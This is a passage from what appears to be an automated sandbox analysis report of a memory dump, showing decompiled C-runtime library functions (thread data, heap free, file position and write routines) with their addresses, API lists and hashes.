                                                                                                                        				_t15 =  *0x422e1c; // 0xfffffffe
                                                                                                                        				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                                                                                        					E00410274(_t25, 0xd);
                                                                                                                        					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                                                                                        					_t33 =  *(_t31 + 0x68);
                                                                                                                        					 *(_t34 - 0x1c) = _t33;
                                                                                                                        					__eflags = _t33 -  *0x422d20; // 0x12f1620
                                                                                                                        					if(__eflags != 0) {
                                                                                                                        						__eflags = _t33;
                                                                                                                        						if(_t33 != 0) {
                                                                                                                        							_t23 = InterlockedDecrement(_t33);
                                                                                                                        							__eflags = _t23;
                                                                                                                        							if(_t23 == 0) {
                                                                                                                        								__eflags = _t33 - 0x4228f8;
                                                                                                                        								if(__eflags != 0) {
                                                                                                                        									_push(_t33);
                                                                                                                        									E0040E815(_t25, _t31, _t33, __eflags);
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						_t21 =  *0x422d20; // 0x12f1620
                                                                                                                        						 *(_t31 + 0x68) = _t21;
                                                                                                                        						_t33 =  *0x422d20; // 0x12f1620
                                                                                                                        						 *(_t34 - 0x1c) = _t33;
                                                                                                                        						InterlockedIncrement(_t33);
                                                                                                                        					}
                                                                                                                        					 *(_t34 - 4) = 0xfffffffe;
                                                                                                                        					E004164F9();
                                                                                                                        				} else {
                                                                                                                        					_t33 =  *(_t31 + 0x68);
                                                                                                                        				}
                                                                                                                        				if(_t33 == 0) {
                                                                                                                        					E00410FBC(_t29, _t31, 0x20);
                                                                                                                        				}
                                                                                                                        				return E00410DB1(_t33);
                                                                                                                        			}










                                                                                                                        0x0041645e
                                                                                                                        0x0041645e
                                                                                                                        0x0041645e
                                                                                                                        0x0041645e
                                                                                                                        0x00416460
                                                                                                                        0x00416465
                                                                                                                        0x0041646f
                                                                                                                        0x00416471
                                                                                                                        0x00416479
                                                                                                                        0x0041649a
                                                                                                                        0x004164a0
                                                                                                                        0x004164a4
                                                                                                                        0x004164a7
                                                                                                                        0x004164aa
                                                                                                                        0x004164b0
                                                                                                                        0x004164b2
                                                                                                                        0x004164b4
                                                                                                                        0x004164b7
                                                                                                                        0x004164bd
                                                                                                                        0x004164bf
                                                                                                                        0x004164c1
                                                                                                                        0x004164c7
                                                                                                                        0x004164c9
                                                                                                                        0x004164ca
                                                                                                                        0x004164cf
                                                                                                                        0x004164c7
                                                                                                                        0x004164bf
                                                                                                                        0x004164d0
                                                                                                                        0x004164d5
                                                                                                                        0x004164d8
                                                                                                                        0x004164de
                                                                                                                        0x004164e2
                                                                                                                        0x004164e2
                                                                                                                        0x004164e8
                                                                                                                        0x004164ef
                                                                                                                        0x00416481
                                                                                                                        0x00416481
                                                                                                                        0x00416481
                                                                                                                        0x00416486
                                                                                                                        0x0041648a
                                                                                                                        0x0041648f
                                                                                                                        0x00416497

                                                                                                                        APIs
                                                                                                                        • __getptd.LIBCMT ref: 0041646A
                                                                                                                          • Part of subcall function 00413823: __getptd_noexit.LIBCMT ref: 00413826
                                                                                                                          • Part of subcall function 00413823: __amsg_exit.LIBCMT ref: 00413833
                                                                                                                        • __amsg_exit.LIBCMT ref: 0041648A
                                                                                                                        • __lock.LIBCMT ref: 0041649A
                                                                                                                        • InterlockedDecrement.KERNEL32(?), ref: 004164B7
                                                                                                                        • InterlockedIncrement.KERNEL32(012F1620), ref: 004164E2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.613517029.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.613580221.0000000000458000.00000040.00000001.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4271482742-0
                                                                                                                        • Opcode ID: e83d88abb193b01d5e468014b9b481e8098adb43f9d5a20488817c2793bd651c
                                                                                                                        • Instruction ID: d42327c9dad0fc5dfc2df0c0c0ca09713bf0954cfd5630f56dd182ed649c3a23
                                                                                                                        • Opcode Fuzzy Hash: e83d88abb193b01d5e468014b9b481e8098adb43f9d5a20488817c2793bd651c
                                                                                                                        • Instruction Fuzzy Hash: AE01A131E00725ABD721AF66A8057DE7760BB04B14F46416FE80063391CBBCA9C2DBDD
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 41%
                                                                                                                        			E0040E815(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                        				intOrPtr* _t10;
                                                                                                                        				intOrPtr _t13;
                                                                                                                        				intOrPtr _t23;
                                                                                                                        				void* _t25;
                                                                                                                        
                                                                                                                        				_push(0xc);
                                                                                                                        				_push(0x420f00);
                                                                                                                        				_t8 = E00410D6C(__ebx, __edi, __esi);
                                                                                                                        				_t23 =  *((intOrPtr*)(_t25 + 8));
                                                                                                                        				if(_t23 == 0) {
                                                                                                                        					L9:
                                                                                                                        					return E00410DB1(_t8);
                                                                                                                        				}
                                                                                                                        				if( *0x4253e0 != 3) {
                                                                                                                        					_push(_t23);
                                                                                                                        					L7:
                                                                                                                        					_t8 = HeapFree( *0x42394c, 0, ??);
                                                                                                                        					_t31 = _t8;
                                                                                                                        					if(_t8 == 0) {
                                                                                                                        						_t10 = E0040F27B(_t31);
                                                                                                                        						 *_t10 = E0040F239(GetLastError());
                                                                                                                        					}
                                                                                                                        					goto L9;
                                                                                                                        				}
                                                                                                                        				E00410274(__ebx, 4);
                                                                                                                        				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
                                                                                                                        				_t13 = E004102A7(_t23);
                                                                                                                        				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
                                                                                                                        				if(_t13 != 0) {
                                                                                                                        					_push(_t23);
                                                                                                                        					_push(_t13);
                                                                                                                        					E004102D7();
                                                                                                                        				}
                                                                                                                        				 *(_t25 - 4) = 0xfffffffe;
                                                                                                                        				_t8 = E0040E86B();
                                                                                                                        				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
                                                                                                                        					goto L9;
                                                                                                                        				} else {
                                                                                                                        					_push( *((intOrPtr*)(_t25 + 8)));
                                                                                                                        					goto L7;
                                                                                                                        				}
                                                                                                                        			}







                                                                                                                        0x0040e815
                                                                                                                        0x0040e817
                                                                                                                        0x0040e81c
                                                                                                                        0x0040e821
                                                                                                                        0x0040e826
                                                                                                                        0x0040e89d
                                                                                                                        0x0040e8a2
                                                                                                                        0x0040e8a2
                                                                                                                        0x0040e82f
                                                                                                                        0x0040e874
                                                                                                                        0x0040e875
                                                                                                                        0x0040e87d
                                                                                                                        0x0040e883
                                                                                                                        0x0040e885
                                                                                                                        0x0040e887
                                                                                                                        0x0040e89a
                                                                                                                        0x0040e89c
                                                                                                                        0x00000000
                                                                                                                        0x0040e885
                                                                                                                        0x0040e833
                                                                                                                        0x0040e839
                                                                                                                        0x0040e83e
                                                                                                                        0x0040e844
                                                                                                                        0x0040e849
                                                                                                                        0x0040e84b
                                                                                                                        0x0040e84c
                                                                                                                        0x0040e84d
                                                                                                                        0x0040e853
                                                                                                                        0x0040e854
                                                                                                                        0x0040e85b
                                                                                                                        0x0040e864
                                                                                                                        0x00000000
                                                                                                                        0x0040e866
                                                                                                                        0x0040e866
                                                                                                                        0x00000000
                                                                                                                        0x0040e866

                                                                                                                        APIs
                                                                                                                        • __lock.LIBCMT ref: 0040E833
                                                                                                                          • Part of subcall function 00410274: __mtinitlocknum.LIBCMT ref: 0041028A
                                                                                                                          • Part of subcall function 00410274: __amsg_exit.LIBCMT ref: 00410296
                                                                                                                          • Part of subcall function 00410274: EnterCriticalSection.KERNEL32(004137C6,004137C6,?,0041186F,00000004,004211B8,0000000C,00414DBE,00000001,004137D5,00000000,00000000,00000000,?,004137D5,00000001), ref: 0041029E
                                                                                                                        • ___sbh_find_block.LIBCMT ref: 0040E83E
                                                                                                                        • ___sbh_free_block.LIBCMT ref: 0040E84D
                                                                                                                        • HeapFree.KERNEL32(00000000,00000001,00420F00,0000000C,00410255,00000000,00421158,0000000C,0041028F,00000001,004137C6,?,0041186F,00000004,004211B8,0000000C), ref: 0040E87D
                                                                                                                        • GetLastError.KERNEL32(?,0041186F,00000004,004211B8,0000000C,00414DBE,00000001,004137D5,00000000,00000000,00000000,?,004137D5,00000001,00000214), ref: 0040E88E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.613517029.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.613580221.0000000000458000.00000040.00000001.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2714421763-0
                                                                                                                        • Opcode ID: 97c03034d3db45eab9d729788b4d65cbd3219b7d3ec9c6bcf073ff7910037ad7
                                                                                                                        • Instruction ID: 633a2435a1d7ed1936b8ae1707e1a5504be1ccb809ebcc9e2d72e4d801c96ecc
                                                                                                                        • Opcode Fuzzy Hash: 97c03034d3db45eab9d729788b4d65cbd3219b7d3ec9c6bcf073ff7910037ad7
                                                                                                                        • Instruction Fuzzy Hash: F6017C36901311EADB307BB3A80AB9E3A60AF00768F50857FF510B71D1DBBC89918A5D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 86%
                                                                                                                        			E0040FA08(void* __edx, void* __esi, char _a4) {
                                                                                                                        				signed int _v8;
                                                                                                                        				signed int _v12;
                                                                                                                        				signed int _v16;
                                                                                                                        				void* __ebx;
                                                                                                                        				void* __edi;
                                                                                                                        				void* __ebp;
                                                                                                                        				signed int _t70;
                                                                                                                        				signed int _t71;
                                                                                                                        				intOrPtr _t73;
                                                                                                                        				signed int _t75;
                                                                                                                        				signed int _t81;
                                                                                                                        				char _t82;
                                                                                                                        				signed int _t84;
                                                                                                                        				intOrPtr* _t86;
                                                                                                                        				signed int _t87;
                                                                                                                        				intOrPtr* _t90;
                                                                                                                        				signed int _t92;
                                                                                                                        				signed int _t94;
                                                                                                                        				void* _t96;
                                                                                                                        				signed char _t98;
                                                                                                                        				signed int _t99;
                                                                                                                        				intOrPtr _t102;
                                                                                                                        				signed int _t103;
                                                                                                                        				intOrPtr* _t104;
                                                                                                                        				signed int _t111;
                                                                                                                        				signed int _t114;
                                                                                                                        				intOrPtr _t115;
                                                                                                                        
                                                                                                                        				_t105 = __esi;
                                                                                                                        				_t97 = __edx;
                                                                                                                        				_t104 = _a4;
                                                                                                                        				_t87 = 0;
                                                                                                                        				_t121 = _t104;
                                                                                                                        				if(_t104 != 0) {
                                                                                                                        					_t70 = E00412CC3(__edx, _t104, _t104);
                                                                                                                        					__eflags =  *(_t104 + 4);
                                                                                                                        					_v8 = _t70;
                                                                                                                        					if(__eflags < 0) {
                                                                                                                        						 *(_t104 + 4) = 0;
                                                                                                                        					}
                                                                                                                        					_push(1);
                                                                                                                        					_push(_t87);
                                                                                                                        					_push(_t70);
                                                                                                                        					_t71 = E00414A27(_t87, _t97, _t104, _t105, __eflags);
                                                                                                                        					__eflags = _t71 - _t87;
                                                                                                                        					_v12 = _t71;
                                                                                                                        					if(_t71 < _t87) {
                                                                                                                        						L2:
                                                                                                                        						return _t71 | 0xffffffff;
                                                                                                                        					} else {
                                                                                                                        						_t98 =  *(_t104 + 0xc);
                                                                                                                        						__eflags = _t98 & 0x00000108;
                                                                                                                        						if((_t98 & 0x00000108) != 0) {
                                                                                                                        							_t73 =  *_t104;
                                                                                                                        							_t92 =  *(_t104 + 8);
                                                                                                                        							_push(_t105);
                                                                                                                        							_v16 = _t73 - _t92;
                                                                                                                        							__eflags = _t98 & 0x00000003;
                                                                                                                        							if((_t98 & 0x00000003) == 0) {
                                                                                                                        								__eflags = _t98;
                                                                                                                        								if(__eflags < 0) {
                                                                                                                        									L15:
                                                                                                                        									__eflags = _v12 - _t87;
                                                                                                                        									if(_v12 != _t87) {
                                                                                                                        										__eflags =  *(_t104 + 0xc) & 0x00000001;
                                                                                                                        										if(( *(_t104 + 0xc) & 0x00000001) == 0) {
                                                                                                                        											L40:
                                                                                                                        											_t75 = _v16 + _v12;
                                                                                                                        											__eflags = _t75;
                                                                                                                        											L41:
                                                                                                                        											return _t75;
                                                                                                                        										}
                                                                                                                        										_t99 =  *(_t104 + 4);
                                                                                                                        										__eflags = _t99 - _t87;
                                                                                                                        										if(_t99 != _t87) {
                                                                                                                        											_t90 = 0x4242a0 + (_v8 >> 5) * 4;
                                                                                                                        											_a4 = _t73 - _t92 + _t99;
                                                                                                                        											_t111 = (_v8 & 0x0000001f) << 6;
                                                                                                                        											__eflags =  *( *_t90 + _t111 + 4) & 0x00000080;
                                                                                                                        											if(__eflags == 0) {
                                                                                                                        												L39:
                                                                                                                        												_t66 =  &_v12;
                                                                                                                        												 *_t66 = _v12 - _a4;
                                                                                                                        												__eflags =  *_t66;
                                                                                                                        												goto L40;
                                                                                                                        											}
                                                                                                                        											_push(2);
                                                                                                                        											_push(0);
                                                                                                                        											_push(_v8);
                                                                                                                        											__eflags = E00414A27(_t90, _t99, _t104, _t111, __eflags) - _v12;
                                                                                                                        											if(__eflags != 0) {
                                                                                                                        												_push(0);
                                                                                                                        												_push(_v12);
                                                                                                                        												_push(_v8);
                                                                                                                        												_t81 = E00414A27(_t90, _t99, _t104, _t111, __eflags);
                                                                                                                        												__eflags = _t81;
                                                                                                                        												if(_t81 >= 0) {
                                                                                                                        													_t82 = 0x200;
                                                                                                                        													__eflags = _a4 - 0x200;
                                                                                                                        													if(_a4 > 0x200) {
                                                                                                                        														L35:
                                                                                                                        														_t82 =  *((intOrPtr*)(_t104 + 0x18));
                                                                                                                        														L36:
                                                                                                                        														_a4 = _t82;
                                                                                                                        														__eflags =  *( *_t90 + _t111 + 4) & 0x00000004;
                                                                                                                        														L37:
                                                                                                                        														if(__eflags != 0) {
                                                                                                                        															_t63 =  &_a4;
                                                                                                                        															 *_t63 = _a4 + 1;
                                                                                                                        															__eflags =  *_t63;
                                                                                                                        														}
                                                                                                                        														goto L39;
                                                                                                                        													}
                                                                                                                        													_t94 =  *(_t104 + 0xc);
                                                                                                                        													__eflags = _t94 & 0x00000008;
                                                                                                                        													if((_t94 & 0x00000008) == 0) {
                                                                                                                        														goto L35;
                                                                                                                        													}
                                                                                                                        													__eflags = _t94 & 0x00000400;
                                                                                                                        													if((_t94 & 0x00000400) == 0) {
                                                                                                                        														goto L36;
                                                                                                                        													}
                                                                                                                        													goto L35;
                                                                                                                        												}
                                                                                                                        												L31:
                                                                                                                        												_t75 = _t81 | 0xffffffff;
                                                                                                                        												goto L41;
                                                                                                                        											}
                                                                                                                        											_t84 =  *(_t104 + 8);
                                                                                                                        											_t96 = _a4 + _t84;
                                                                                                                        											while(1) {
                                                                                                                        												__eflags = _t84 - _t96;
                                                                                                                        												if(_t84 >= _t96) {
                                                                                                                        													break;
                                                                                                                        												}
                                                                                                                        												__eflags =  *_t84 - 0xa;
                                                                                                                        												if( *_t84 == 0xa) {
                                                                                                                        													_t44 =  &_a4;
                                                                                                                        													 *_t44 = _a4 + 1;
                                                                                                                        													__eflags =  *_t44;
                                                                                                                        												}
                                                                                                                        												_t84 = _t84 + 1;
                                                                                                                        												__eflags = _t84;
                                                                                                                        											}
                                                                                                                        											__eflags =  *(_t104 + 0xc) & 0x00002000;
                                                                                                                        											goto L37;
                                                                                                                        										}
                                                                                                                        										_v16 = _t87;
                                                                                                                        										goto L40;
                                                                                                                        									}
                                                                                                                        									_t75 = _v16;
                                                                                                                        									goto L41;
                                                                                                                        								}
                                                                                                                        								_t81 = E0040F27B(__eflags);
                                                                                                                        								 *_t81 = 0x16;
                                                                                                                        								goto L31;
                                                                                                                        							}
                                                                                                                        							_t102 =  *((intOrPtr*)(0x4242a0 + (_v8 >> 5) * 4));
                                                                                                                        							_t114 = (_v8 & 0x0000001f) << 6;
                                                                                                                        							__eflags =  *(_t102 + _t114 + 4) & 0x00000080;
                                                                                                                        							if(( *(_t102 + _t114 + 4) & 0x00000080) == 0) {
                                                                                                                        								goto L15;
                                                                                                                        							}
                                                                                                                        							_t103 = _t92;
                                                                                                                        							__eflags = _t103 - _t73;
                                                                                                                        							if(_t103 >= _t73) {
                                                                                                                        								goto L15;
                                                                                                                        							}
                                                                                                                        							_t115 = _t73;
                                                                                                                        							do {
                                                                                                                        								__eflags =  *_t103 - 0xa;
                                                                                                                        								if( *_t103 == 0xa) {
                                                                                                                        									_v16 = _v16 + 1;
                                                                                                                        									_t87 = 0;
                                                                                                                        									__eflags = 0;
                                                                                                                        								}
                                                                                                                        								_t103 = _t103 + 1;
                                                                                                                        								__eflags = _t103 - _t115;
                                                                                                                        							} while (_t103 < _t115);
                                                                                                                        							goto L15;
                                                                                                                        						}
                                                                                                                        						return _t71 -  *(_t104 + 4);
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				_t86 = E0040F27B(_t121);
                                                                                                                        				_push(0);
                                                                                                                        				_push(0);
                                                                                                                        				_push(0);
                                                                                                                        				_push(0);
                                                                                                                        				_push(0);
                                                                                                                        				 *_t86 = 0x16;
                                                                                                                        				_t71 = E00411AE6(__edx, _t104, __esi);
                                                                                                                        				goto L2;
                                                                                                                        			}






























                                                                                                                        0x0040fa08
                                                                                                                        0x0040fa08
                                                                                                                        0x0040fa12
                                                                                                                        0x0040fa15
                                                                                                                        0x0040fa17
                                                                                                                        0x0040fa19
                                                                                                                        0x0040fa3c
                                                                                                                        0x0040fa41
                                                                                                                        0x0040fa45
                                                                                                                        0x0040fa48
                                                                                                                        0x0040fa4a
                                                                                                                        0x0040fa4a
                                                                                                                        0x0040fa4d
                                                                                                                        0x0040fa4f
                                                                                                                        0x0040fa50
                                                                                                                        0x0040fa51
                                                                                                                        0x0040fa59
                                                                                                                        0x0040fa5b
                                                                                                                        0x0040fa5e
                                                                                                                        0x0040fa33
                                                                                                                        0x00000000
                                                                                                                        0x0040fa60
                                                                                                                        0x0040fa60
                                                                                                                        0x0040fa63
                                                                                                                        0x0040fa69
                                                                                                                        0x0040fa73
                                                                                                                        0x0040fa75
                                                                                                                        0x0040fa78
                                                                                                                        0x0040fa7d
                                                                                                                        0x0040fa80
                                                                                                                        0x0040fa83
                                                                                                                        0x0040fac6
                                                                                                                        0x0040fac8
                                                                                                                        0x0040fab9
                                                                                                                        0x0040fab9
                                                                                                                        0x0040fabc
                                                                                                                        0x0040fada
                                                                                                                        0x0040fade
                                                                                                                        0x0040fb98
                                                                                                                        0x0040fb9e
                                                                                                                        0x0040fb9e
                                                                                                                        0x0040fba0
                                                                                                                        0x00000000
                                                                                                                        0x0040fba0
                                                                                                                        0x0040fae4
                                                                                                                        0x0040fae7
                                                                                                                        0x0040fae9
                                                                                                                        0x0040fb03
                                                                                                                        0x0040fb0a
                                                                                                                        0x0040fb0f
                                                                                                                        0x0040fb12
                                                                                                                        0x0040fb17
                                                                                                                        0x0040fb92
                                                                                                                        0x0040fb95
                                                                                                                        0x0040fb95
                                                                                                                        0x0040fb95
                                                                                                                        0x00000000
                                                                                                                        0x0040fb95
                                                                                                                        0x0040fb19
                                                                                                                        0x0040fb1b
                                                                                                                        0x0040fb1d
                                                                                                                        0x0040fb28
                                                                                                                        0x0040fb2b
                                                                                                                        0x0040fb4d
                                                                                                                        0x0040fb4f
                                                                                                                        0x0040fb52
                                                                                                                        0x0040fb55
                                                                                                                        0x0040fb5d
                                                                                                                        0x0040fb5f
                                                                                                                        0x0040fb66
                                                                                                                        0x0040fb6b
                                                                                                                        0x0040fb6e
                                                                                                                        0x0040fb80
                                                                                                                        0x0040fb80
                                                                                                                        0x0040fb83
                                                                                                                        0x0040fb83
                                                                                                                        0x0040fb88
                                                                                                                        0x0040fb8d
                                                                                                                        0x0040fb8d
                                                                                                                        0x0040fb8f
                                                                                                                        0x0040fb8f
                                                                                                                        0x0040fb8f
                                                                                                                        0x0040fb8f
                                                                                                                        0x00000000
                                                                                                                        0x0040fb8d
                                                                                                                        0x0040fb70
                                                                                                                        0x0040fb73
                                                                                                                        0x0040fb76
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040fb78
                                                                                                                        0x0040fb7e
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040fb7e
                                                                                                                        0x0040fb61
                                                                                                                        0x0040fb61
                                                                                                                        0x00000000
                                                                                                                        0x0040fb61
                                                                                                                        0x0040fb2d
                                                                                                                        0x0040fb33
                                                                                                                        0x0040fb40
                                                                                                                        0x0040fb40
                                                                                                                        0x0040fb42
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040fb37
                                                                                                                        0x0040fb3a
                                                                                                                        0x0040fb3c
                                                                                                                        0x0040fb3c
                                                                                                                        0x0040fb3c
                                                                                                                        0x0040fb3c
                                                                                                                        0x0040fb3f
                                                                                                                        0x0040fb3f
                                                                                                                        0x0040fb3f
                                                                                                                        0x0040fb44
                                                                                                                        0x00000000
                                                                                                                        0x0040fb44
                                                                                                                        0x0040faeb
                                                                                                                        0x00000000
                                                                                                                        0x0040faeb
                                                                                                                        0x0040fabe
                                                                                                                        0x00000000
                                                                                                                        0x0040fabe
                                                                                                                        0x0040faca
                                                                                                                        0x0040facf
                                                                                                                        0x00000000
                                                                                                                        0x0040facf
                                                                                                                        0x0040fa8e
                                                                                                                        0x0040fa98
                                                                                                                        0x0040fa9b
                                                                                                                        0x0040faa0
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040faa2
                                                                                                                        0x0040faa4
                                                                                                                        0x0040faa6
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040faa8
                                                                                                                        0x0040faaa
                                                                                                                        0x0040faaa
                                                                                                                        0x0040faad
                                                                                                                        0x0040faaf
                                                                                                                        0x0040fab2
                                                                                                                        0x0040fab2
                                                                                                                        0x0040fab2
                                                                                                                        0x0040fab4
                                                                                                                        0x0040fab5
                                                                                                                        0x0040fab5
                                                                                                                        0x00000000
                                                                                                                        0x0040faaa
                                                                                                                        0x00000000
                                                                                                                        0x0040fa6b
                                                                                                                        0x0040fa5e
                                                                                                                        0x0040fa1b
                                                                                                                        0x0040fa20
                                                                                                                        0x0040fa21
                                                                                                                        0x0040fa22
                                                                                                                        0x0040fa23
                                                                                                                        0x0040fa24
                                                                                                                        0x0040fa25
                                                                                                                        0x0040fa2b
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • __fileno.LIBCMT ref: 0040FA3C
                                                                                                                        • __locking.LIBCMT ref: 0040FA51
                                                                                                                          • Part of subcall function 0040F27B: __getptd_noexit.LIBCMT ref: 0040F27B
                                                                                                                          • Part of subcall function 00411AE6: __decode_pointer.LIBCMT ref: 00411AF1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.613517029.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.613580221.0000000000458000.00000040.00000001.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: __decode_pointer__fileno__getptd_noexit__locking
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2395185920-0
                                                                                                                        • Opcode ID: 140d85921706fc2f895eb291010658fff98a80f5cba46298b4189946b415ee23
                                                                                                                        • Instruction ID: 73422a71fbb45345cbb10fac6a759ac1675b49add2664a2055bfecdbe2158fd7
                                                                                                                        • Opcode Fuzzy Hash: 140d85921706fc2f895eb291010658fff98a80f5cba46298b4189946b415ee23
                                                                                                                        • Instruction Fuzzy Hash: 3B51C371E00204ABDB20CF69C990B59BBB1AF45354F14817BE919B7BC1D738AE49CF89
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 91%
                                                                                                                        			E0040ED64(signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                                                                                                                        				signed int _v8;
                                                                                                                        				signed int _v12;
                                                                                                                        				signed int _v16;
                                                                                                                        				void* __ebx;
                                                                                                                        				void* __edi;
                                                                                                                        				void* __esi;
                                                                                                                        				void* __ebp;
                                                                                                                        				signed int _t59;
                                                                                                                        				intOrPtr* _t61;
                                                                                                                        				signed int _t63;
                                                                                                                        				void* _t68;
                                                                                                                        				signed int _t69;
                                                                                                                        				signed int _t72;
                                                                                                                        				signed int _t74;
                                                                                                                        				signed int _t75;
                                                                                                                        				signed int _t77;
                                                                                                                        				signed int _t78;
                                                                                                                        				signed int _t81;
                                                                                                                        				signed int _t82;
                                                                                                                        				signed int _t84;
                                                                                                                        				signed int _t88;
                                                                                                                        				signed int _t97;
                                                                                                                        				signed int _t98;
                                                                                                                        				signed int _t99;
                                                                                                                        				intOrPtr* _t100;
                                                                                                                        				void* _t101;
                                                                                                                        
                                                                                                                        				_t90 = __edx;
                                                                                                                        				if(_a8 == 0 || _a12 == 0) {
                                                                                                                        					L4:
                                                                                                                        					return 0;
                                                                                                                        				} else {
                                                                                                                        					_t100 = _a16;
                                                                                                                        					_t105 = _t100;
                                                                                                                        					if(_t100 != 0) {
                                                                                                                        						_t82 = _a4;
                                                                                                                        						__eflags = _t82;
                                                                                                                        						if(__eflags == 0) {
                                                                                                                        							goto L3;
                                                                                                                        						}
                                                                                                                        						_t63 = _t59 | 0xffffffff;
                                                                                                                        						_t90 = _t63 % _a8;
                                                                                                                        						__eflags = _a12 - _t63 / _a8;
                                                                                                                        						if(__eflags > 0) {
                                                                                                                        							goto L3;
                                                                                                                        						}
                                                                                                                        						_t97 = _a8 * _a12;
                                                                                                                        						__eflags =  *(_t100 + 0xc) & 0x0000010c;
                                                                                                                        						_v8 = _t82;
                                                                                                                        						_v16 = _t97;
                                                                                                                        						_t81 = _t97;
                                                                                                                        						if(( *(_t100 + 0xc) & 0x0000010c) == 0) {
                                                                                                                        							_v12 = 0x1000;
                                                                                                                        						} else {
                                                                                                                        							_v12 =  *(_t100 + 0x18);
                                                                                                                        						}
                                                                                                                        						__eflags = _t97;
                                                                                                                        						if(_t97 == 0) {
                                                                                                                        							L32:
                                                                                                                        							return _a12;
                                                                                                                        						} else {
                                                                                                                        							do {
                                                                                                                        								_t84 =  *(_t100 + 0xc) & 0x00000108;
                                                                                                                        								__eflags = _t84;
                                                                                                                        								if(_t84 == 0) {
                                                                                                                        									L18:
                                                                                                                        									__eflags = _t81 - _v12;
                                                                                                                        									if(_t81 < _v12) {
                                                                                                                        										_t68 = E00412350(_t90, _t97,  *_v8, _t100);
                                                                                                                        										__eflags = _t68 - 0xffffffff;
                                                                                                                        										if(_t68 == 0xffffffff) {
                                                                                                                        											L34:
                                                                                                                        											_t69 = _t97;
                                                                                                                        											L35:
                                                                                                                        											return (_t69 - _t81) / _a8;
                                                                                                                        										}
                                                                                                                        										_v8 = _v8 + 1;
                                                                                                                        										_t72 =  *(_t100 + 0x18);
                                                                                                                        										_t81 = _t81 - 1;
                                                                                                                        										_v12 = _t72;
                                                                                                                        										__eflags = _t72;
                                                                                                                        										if(_t72 <= 0) {
                                                                                                                        											_v12 = 1;
                                                                                                                        										}
                                                                                                                        										goto L31;
                                                                                                                        									}
                                                                                                                        									__eflags = _t84;
                                                                                                                        									if(_t84 == 0) {
                                                                                                                        										L21:
                                                                                                                        										__eflags = _v12;
                                                                                                                        										_t98 = _t81;
                                                                                                                        										if(_v12 != 0) {
                                                                                                                        											_t75 = _t81;
                                                                                                                        											_t90 = _t75 % _v12;
                                                                                                                        											_t98 = _t98 - _t75 % _v12;
                                                                                                                        											__eflags = _t98;
                                                                                                                        										}
                                                                                                                        										_push(_t98);
                                                                                                                        										_push(_v8);
                                                                                                                        										_push(E00412CC3(_t90, _t98, _t100));
                                                                                                                        										_t74 = E00412BE7(_t81, _t90, _t98, _t100, __eflags);
                                                                                                                        										_t101 = _t101 + 0xc;
                                                                                                                        										__eflags = _t74 - 0xffffffff;
                                                                                                                        										if(_t74 == 0xffffffff) {
                                                                                                                        											L36:
                                                                                                                        											 *(_t100 + 0xc) =  *(_t100 + 0xc) | 0x00000020;
                                                                                                                        											_t69 = _v16;
                                                                                                                        											goto L35;
                                                                                                                        										} else {
                                                                                                                        											_t88 = _t98;
                                                                                                                        											__eflags = _t74 - _t98;
                                                                                                                        											if(_t74 <= _t98) {
                                                                                                                        												_t88 = _t74;
                                                                                                                        											}
                                                                                                                        											_v8 = _v8 + _t88;
                                                                                                                        											_t81 = _t81 - _t88;
                                                                                                                        											__eflags = _t74 - _t98;
                                                                                                                        											if(_t74 < _t98) {
                                                                                                                        												goto L36;
                                                                                                                        											} else {
                                                                                                                        												L27:
                                                                                                                        												_t97 = _v16;
                                                                                                                        												goto L31;
                                                                                                                        											}
                                                                                                                        										}
                                                                                                                        									}
                                                                                                                        									_t77 = E0040F4BB(_t100);
                                                                                                                        									__eflags = _t77;
                                                                                                                        									if(_t77 != 0) {
                                                                                                                        										goto L34;
                                                                                                                        									}
                                                                                                                        									goto L21;
                                                                                                                        								}
                                                                                                                        								_t78 =  *(_t100 + 4);
                                                                                                                        								__eflags = _t78;
                                                                                                                        								if(__eflags == 0) {
                                                                                                                        									goto L18;
                                                                                                                        								}
                                                                                                                        								if(__eflags < 0) {
                                                                                                                        									_t48 = _t100 + 0xc;
                                                                                                                        									 *_t48 =  *(_t100 + 0xc) | 0x00000020;
                                                                                                                        									__eflags =  *_t48;
                                                                                                                        									goto L34;
                                                                                                                        								}
